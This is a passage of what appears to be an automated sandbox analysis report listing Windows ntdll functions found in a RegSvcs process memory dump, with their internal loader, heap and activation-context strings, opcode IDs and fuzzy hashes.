                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-204845295
                                                        • Opcode ID: 6b0ef37530f6adfc620fb89a308784897d54a279798f9c43636cc4b5a65f56a2
                                                        • Instruction ID: 0f85633c8adf0777c03b097af34fc3bb54f5bc783f4fe9970db0082ec51c0e7b
                                                        • Opcode Fuzzy Hash: 6b0ef37530f6adfc620fb89a308784897d54a279798f9c43636cc4b5a65f56a2
                                                        • Instruction Fuzzy Hash: 0C51E1712083019FE725EF28CC91A6B77E9FF84768F04491DE985972A4DB70E944CB92
                                                        Function 01652674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01692178
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016921BF
                                                        • SXS: %s() passed the empty activation context, xrefs: 01692165
                                                        • RtlGetAssemblyStorageRoot, xrefs: 01692160, 0169219A, 016921BA
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01692180
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0169219F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        • Opcode ID: 59eac647a97c6b4e53b377dfeef0ddf3e1ea80861bcce05535e163657380da44
                                                        • Instruction ID: d0f60609bb4faeeeca29bbf3fd6feee4ca54ba8b4a4ed42a1b9f5ef82192c684
                                                        • Opcode Fuzzy Hash: 59eac647a97c6b4e53b377dfeef0ddf3e1ea80861bcce05535e163657380da44
                                                        • Instruction Fuzzy Hash: 6A314876F00215B7EB22CA998CA1F6B7B7DEB65A41F05406DFF0567240D370AE01C7A1
                                                        Function 0165C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0165C6C3
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 016981E5
                                                        • LdrpInitializeProcess, xrefs: 0165C6C4
                                                        • Loading import redirection DLL: '%wZ', xrefs: 01698170
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01698181, 016981F5
                                                        • LdrpInitializeImportRedirection, xrefs: 01698177, 016981EB
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        • Opcode ID: a62e0cc2a47c144a0a07605006b1bb50714e6c1289969970553d058225b94282
                                                        • Instruction ID: 86a7cd99d0e35456778b4412876b222dd92d98a3d03b9a3a3e2442e0d9cd26ad
                                                        • Opcode Fuzzy Hash: a62e0cc2a47c144a0a07605006b1bb50714e6c1289969970553d058225b94282
                                                        • Instruction Fuzzy Hash: E13122B1644306AFD325EF28DC46E2A779AFF95B20F04055CFD45AB391E660EC04C7A6
                                                        Function 0166096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 01662DF0: LdrInitializeThunk.NTDLL ref: 01662DFA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BA3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660BB6
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D60
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01660D74
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                        • String ID:
                                                        • API String ID: 1404860816-0
                                                        • Opcode ID: 54ab76e53b756ff0c69347b5fd065d88283ce04f789416c4a663d725021a018b
                                                        • Instruction ID: c78c349a46ba9bf35a2b814d350ceb4eaf3a89747f25f847d5e7a9a69c508312
                                                        • Opcode Fuzzy Hash: 54ab76e53b756ff0c69347b5fd065d88283ce04f789416c4a663d725021a018b
                                                        • Instruction Fuzzy Hash: B54239759007159FDB21CF68CC80BAAB7F9BF44314F1445AEE989AB241E770AA85CF60
                                                        Function 0162A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        • Opcode ID: d6ac719d08df932bdebf4407be4bb1339b50a361af7dd5e244537080d4afe990
                                                        • Instruction ID: aed819404688b28ebe655d5509301966b87b0f45c0d30406147a4eaba5da056d
                                                        • Opcode Fuzzy Hash: d6ac719d08df932bdebf4407be4bb1339b50a361af7dd5e244537080d4afe990
                                                        • Instruction Fuzzy Hash: 2DC1AA701087928FD721DF98C940B6AB7E5BF84304F04896EF9859BB50E3B4C94ACF56
                                                        Function 01658402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01658421
                                                        • LdrpInitializeProcess, xrefs: 01658422
                                                        • @, xrefs: 01658591
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0165855E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1918872054
                                                        • Opcode ID: 58a84b655b1941d5020dfb45a1f7e6595ea3914ed03924f843ccdf691801fff3
                                                        • Instruction ID: bf41b6cf54e710b9422abd702caced4621730166137709d462cb4f86abc11382
                                                        • Opcode Fuzzy Hash: 58a84b655b1941d5020dfb45a1f7e6595ea3914ed03924f843ccdf691801fff3
                                                        • Instruction Fuzzy Hash: EA918B71508345AFDB62DE26CC80FABBAEDFB84658F40092EFA8597151E730D904CB66
                                                        Function 0165273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • .Local, xrefs: 016528D8
                                                        • SXS: %s() passed the empty activation context, xrefs: 016921DE
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016921D9, 016922B1
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016922B6
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        • Opcode ID: 62fbe577a47a232008a4b40a400e99d60e07e2eebbe461fe5b26a615b513df84
                                                        • Instruction ID: 5610cc46abf0adac761209916e87baae62c08676d06807df2b3dd488d4dfc894
                                                        • Opcode Fuzzy Hash: 62fbe577a47a232008a4b40a400e99d60e07e2eebbe461fe5b26a615b513df84
                                                        • Instruction Fuzzy Hash: 3EA1AB3190022ADBDB25CF69CCA4BA9B7B5BF58314F2541EED908AB351D7309E81CF94
                                                        Function 01654AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01693437
                                                        • RtlDeactivateActivationContext, xrefs: 01693425, 01693432, 01693451
                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0169342A
                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01693456
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                        • API String ID: 0-1245972979
                                                        • Opcode ID: e86505092a15415f339113dbc1dbec13886568171b959fcc1cadec25279be02b
                                                        • Instruction ID: 8f27eb32b89c90019a09e2e3507a3fe30ddc4edda30106afc0811d7b089b81bc
                                                        • Opcode Fuzzy Hash: e86505092a15415f339113dbc1dbec13886568171b959fcc1cadec25279be02b
                                                        • Instruction Fuzzy Hash: FA6103366457129BDB228F2CCC45B2AB7E9AF80B50F15855DEC959B380EB30EC41CB95
                                                        Function 016264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0168106B
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016810AE
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01680FE5
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01681028
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        • API String ID: 0-1468400865
                                                        • Opcode ID: b55b768a4b7ec658d20f6fa5320b1ee5503e9af56e38f90c03838528ffb51759
                                                        • Instruction ID: fedcaebce959fc9dfa20b889862cad424169a113520badcce46f3cd6198fce6e
                                                        • Opcode Fuzzy Hash: b55b768a4b7ec658d20f6fa5320b1ee5503e9af56e38f90c03838528ffb51759
                                                        • Instruction Fuzzy Hash: 6C71DAB1904315AFCB21EF18CC84B9B7BA9AB95764F00446CFD498B24AD734D589CFD2
                                                        Function 0164245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0168A9A2
                                                        • LdrpDynamicShimModule, xrefs: 0168A998
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0168A992
                                                        • apphelp.dll, xrefs: 01642462
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        • Opcode ID: 40766f0747439a1d03b1a75d812afa49a3d9dbf286935927c574667ea479df9a
                                                        • Instruction ID: ebab9575c0d7abab44d41c2f6418a22a26c7f51417e13d3ba16c16b9003b374d
                                                        • Opcode Fuzzy Hash: 40766f0747439a1d03b1a75d812afa49a3d9dbf286935927c574667ea479df9a
                                                        • Instruction Fuzzy Hash: 6D316B75650202EBDB31AF9DDC85E6ABBB5FB84B20F26415EFD0167349C7B05982CB80
                                                        Function 016329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 01633255
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0163327D
                                                        • HEAP: , xrefs: 01633264
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        • Opcode ID: beb4f93cf4221fa00bb50b3e0cdf0ca7bb5b8a2b05167586006e82c9d2185acc
                                                        • Instruction ID: 315edae81eab34eb9b95ec6791035038c414e411fc47745c0b14478b83b8dff8
                                                        • Opcode Fuzzy Hash: beb4f93cf4221fa00bb50b3e0cdf0ca7bb5b8a2b05167586006e82c9d2185acc
                                                        • Instruction Fuzzy Hash: D392BC71A042499FEB25CF68C8547AEBBF1FF89314F18805DE846AB391D734A946CF50
                                                        Function 01630770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: 540cf724d8eb5c73ed3811accd8ab1925d96d840c86a6d82eabbd7020dee3cbc
                                                        • Instruction ID: e89b2cdae23f084df9e468ea54943c08b3c5819514cbeb15f401c40d6b443caa
                                                        • Opcode Fuzzy Hash: 540cf724d8eb5c73ed3811accd8ab1925d96d840c86a6d82eabbd7020dee3cbc
                                                        • Instruction Fuzzy Hash: BBF1AF30600606DFEB25DF68CC94B6AB7F6FF84704F1482A9E5569B381D734E986CB90
                                                        Function 01646962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        • API String ID: 0-1077428164
                                                        • Opcode ID: 18d1ec9b677ef3d664547193d7980801f3c3d9b567a42612661e1d749525c64f
                                                        • Instruction ID: 3df312599905ed2550ceab1a0d3e11de5adcc1d076c7ba6b153b84f7ed052a7a
                                                        • Opcode Fuzzy Hash: 18d1ec9b677ef3d664547193d7980801f3c3d9b567a42612661e1d749525c64f
                                                        • Instruction Fuzzy Hash: A9C26D716083519FEB25CF28CC81BABBBE5AF89754F04892DF98987341D734D845CBA2
                                                        Function 0161A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        • Opcode ID: 66e3b462108e9cc2c115084768d791ba1aaf799aa98a00a9242dc8aa73e0f4da
                                                        • Instruction ID: c8969d603df6a2c8806528b39df793f5656d61a34d2974e505bd757a7d70d722
                                                        • Opcode Fuzzy Hash: 66e3b462108e9cc2c115084768d791ba1aaf799aa98a00a9242dc8aa73e0f4da
                                                        • Instruction Fuzzy Hash: 4AA19E7191162A9BDB31DF68CC88BEAB7B9FF44710F0441EAEA08A7210D7359E84CF54
                                                        Function 01640BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0168A121
                                                        • Failed to allocated memory for shimmed module list, xrefs: 0168A10F
                                                        • LdrpCheckModule, xrefs: 0168A117
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-161242083
                                                        • Opcode ID: 85e42eb243bc58872ee6c8a24d88422aca71315fc50ba16f57a1f43f11134aa6
                                                        • Instruction ID: 0a07079f10b82248c352056c2390c65a1010808ac2962a297c5c9ece3aec0d8e
                                                        • Opcode Fuzzy Hash: 85e42eb243bc58872ee6c8a24d88422aca71315fc50ba16f57a1f43f11134aa6
                                                        • Instruction Fuzzy Hash: 6271D070A00216DFDB25EFACCD80AAEB7F5FB44214F14816DE942A7351E774A942CB54
                                                        Function 01630A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-1334570610
                                                        • Opcode ID: 178633fc1dabdd7e47d9d70bd53a90e00589c17cff79077cce49f916141e7d35
                                                        • Instruction ID: 25f070452fa4f04a920b37fa30de2fa877c07550aaf0b773fd85771b36ab4225
                                                        • Opcode Fuzzy Hash: 178633fc1dabdd7e47d9d70bd53a90e00589c17cff79077cce49f916141e7d35
                                                        • Instruction Fuzzy Hash: 3E61AE706003059FDB29DF28C840B6ABBE2FF85704F14865DE8568B396D771E886CB95
                                                        Function 0165C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 016982E8
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 016982DE
                                                        • Failed to reallocate the system dirs string !, xrefs: 016982D7
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1783798831
                                                        • Opcode ID: fd360fc302135ccd7204513fe1164ffa9e157b1338d116d5be0dd564da292ac7
                                                        • Instruction ID: ba8eea6dcc79c3a657b37db413014c7a64b4514860774b04c4564647633516ad
                                                        • Opcode Fuzzy Hash: fd360fc302135ccd7204513fe1164ffa9e157b1338d116d5be0dd564da292ac7
                                                        • Instruction Fuzzy Hash: 2041E071504301ABCB21EB68DC44B6B7BEDEF89B60F00892EFA4897294E770D801CB95
                                                        Function 016DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • PreferredUILanguages, xrefs: 016DC212
                                                        • @, xrefs: 016DC1F1
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016DC1C5
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        • API String ID: 0-2968386058
                                                        • Opcode ID: 4363f72733ec7c46ab9fb2fda3fd907b64770aaf683e07330fd4e7b8ef366b24
                                                        • Instruction ID: 6d3ffe50855e7982f0a421f3709fb1f14548a012362b1373f827e851994ca6e0
                                                        • Opcode Fuzzy Hash: 4363f72733ec7c46ab9fb2fda3fd907b64770aaf683e07330fd4e7b8ef366b24
                                                        • Instruction Fuzzy Hash: EA417172E0021DEBDB11DAD9CC91BEEBBBDAB14700F14816EE609A7244D7749A44CB94
                                                        Function 016B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        • API String ID: 0-1373925480
                                                        • Opcode ID: 3ccf32fdd9159c572cf60fe00be02e6c10d53027490e85e39116fc10fc42f477
                                                        • Instruction ID: 8dfb85b9ab79ae7535f0fa62dd13560962699763f9128ade4dd5dcb8c4829dbd
                                                        • Opcode Fuzzy Hash: 3ccf32fdd9159c572cf60fe00be02e6c10d53027490e85e39116fc10fc42f477
                                                        • Instruction Fuzzy Hash: EF412632A006588BEB26DBD9CD84BEDBBB9FF55340F14046DD902EB382DB359981CB51
                                                        Function 016A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016A4888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 016A4899
                                                        • LdrpCheckRedirection, xrefs: 016A488F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-3154609507
                                                        • Opcode ID: f78fd2a08833c62fc106fbfc2bc7147049202d60c167c7a0e1b8c2a8b48de1ae
                                                        • Instruction ID: 3e567b938d98e34fa9a4fdf1b980047cc4c8aa15cb968f166791b9e98da8c6b5
                                                        • Opcode Fuzzy Hash: f78fd2a08833c62fc106fbfc2bc7147049202d60c167c7a0e1b8c2a8b48de1ae
                                                        • Instruction Fuzzy Hash: AD41C332A046919FCB21CE5CEC40A267BE9FF49A50B4A056DED4997351DBB0EC01CF91
                                                        Function 01630BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        • Opcode ID: 90e71fa0d1c91a174136b69c75a7bd9c01da67c8a0efb7f5439b720cc48a420b
                                                        • Instruction ID: 7f915320a8c34357439fbab741a0bf1ae657cb7a125ff64346cdf7c8711227ed
                                                        • Opcode Fuzzy Hash: 90e71fa0d1c91a174136b69c75a7bd9c01da67c8a0efb7f5439b720cc48a420b
                                                        • Instruction Fuzzy Hash: A311CD353561029FDB29EA1CCC41B66B3A6AF81716F18826DF4078B255DB30D846C755
                                                        Function 016A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 016A2104
                                                        • LdrpInitializationFailure, xrefs: 016A20FA
                                                        • Process initialization failed with status 0x%08lx, xrefs: 016A20F3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2986994758
                                                        • Opcode ID: d9e6ba07839b377f176e9890be0007851d0909889a9bc5cf72809e431c17770f
                                                        • Instruction ID: 0a398b9a486c5a5bf0225e5e5000dc69d7b9e6412145924e78aa12db1d2e565e
                                                        • Opcode Fuzzy Hash: d9e6ba07839b377f176e9890be0007851d0909889a9bc5cf72809e431c17770f
                                                        • Instruction Fuzzy Hash: C5F0C835680309ABE725DA4CDC56F96376DFB41B64F50005DF70467281D6B0AE40CA95
                                                        Function 016303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        • Opcode ID: 9a346bbe9418ec5373f6945ef0aa304a8517e4eac99bc689d37cfe6935a6fe3c
                                                        • Instruction ID: 685549cb593ec2771926c2a58dec1ec1f9e7366ab011f22a9d26d1efd6b86160
                                                        • Opcode Fuzzy Hash: 9a346bbe9418ec5373f6945ef0aa304a8517e4eac99bc689d37cfe6935a6fe3c
                                                        • Instruction Fuzzy Hash: E2713772A0014A9FDB01DFA8CD94BAEB7F9AF48304F144169E905E7251EB34EE05CB64
                                                        Function 0162A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrResSearchResource Exit, xrefs: 0162AA25
                                                        • LdrResSearchResource Enter, xrefs: 0162AA13
                                                        Memory Dump Source
